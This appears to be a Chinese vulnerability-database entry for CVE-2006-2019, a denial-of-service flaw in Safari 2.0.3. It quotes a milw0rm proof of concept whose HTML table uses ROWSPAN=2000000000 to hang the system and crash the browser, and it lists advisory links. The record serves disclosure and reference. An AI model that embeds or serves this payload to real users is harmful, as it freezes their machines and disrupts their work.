Apple Safari Web浏览器rowspan拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110131 漏洞类型 其他
发布时间 2006-04-24 更新时间 2006-04-26
CVE编号 CVE-2006-2019 CNNVD-ID CNNVD-200604-451
漏洞平台 OSX CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1715
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-451
|漏洞详情
AppleSafari是苹果家族操作系统所使用的WEB浏览器。Safari在处理网页时存在漏洞,恶意网站可能导致浏览器崩溃。Safari打开恶意的HTML文件时可能导致操作系统减慢SRCOD(SpinningRainbowCursorOfDeath),这样无法启动任何应用程序来杀死进程。几分钟后Safari会崩溃。
|漏洞EXP
<!--
Apple Mac OS X Safari 2.0.3 Vulnerability
=========================================

Author: Yannick von Arx
Email:  yannick[dot]vonarx[at]yanux[dot]ch

Release Date:
April 23th, 2006

Vendor:
Apple Computer Inc.

Tested on:
iBook G4 1.2 GHz with Mac OS X 10.4.5 (Build 8H14) + all Updates from Apple except "10.4.6 Update"
iBook G4 1.33 GHz with Mac OS X 10.4.6 (Build 8I127) + all Updates from Apple
PowerMac G4 Dual 867 MHz with Mac OS X 10.4.6 (Build 8I127) + all Updates from Apple
iMac G4 800 MHz with Mac OS X 10.4.6 (Build 8I127) + all Updates from Apple

Versions affected:
Safari 2.0.3 (417.9.2) latest version under 10.4.5 (Build 8H14) and perhaps prior versions
Safari 2.0.3 (417.9.2) latest version under 10.4.6 (Build 8I127) and perhaps prior versions

Overview:
A vulnerabilitiy exists in Safari 2.0.3 (417.9.2) and perhaps in
prior versions which causes the operating system to slow down SRCOD
(Spinning Rainbow Cursor Of Death), and therefore, it's not possible
to launch any applications like Terminal to kill the process. After
several minutes Safari crashes.

Technical Details:
Create a new File with following code ... -->

<HTML>
<TABLE>
<TR><TD ROWSPAN=2000000000>

# milw0rm.com [2006-04-24]
|参考资料

来源:BID
名称:17674
链接:http://www.securityfocus.com/bid/17674
来源:BUGTRAQ
名称:20060424Re:AppleMacOSXSafari2.0.3Vulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/431944/100/0/threaded
来源:BUGTRAQ
名称:20060424AppleMacOSXSafari2.0.3Vulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/431874/100/0/threaded
来源:VUPEN
名称:ADV-2006-1508
链接:http://www.frsirt.com/english/advisories/2006/1508
来源:SECTRACK
名称:1015982
链接:http://securitytracker.com/id?1015982
来源:SECUNIA
名称:19763
链接:http://secunia.com/advisories/19763
来源:FULLDISC
名称:20060424AppleMacOSXSafari2.0.3Vulnerability
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2006-April/045472.html
来源:XF
名称:macosx-safari-table-dos(25998)
链接:http://xforce.iss.net/xforce/xfdb/25998
来源:MILW0RM
名称:1715
链接:http://www.milw0rm.com/exploits/1715
来源:MILW0RM
名称:1715
链接:http://milw0rm.com/exploits/1715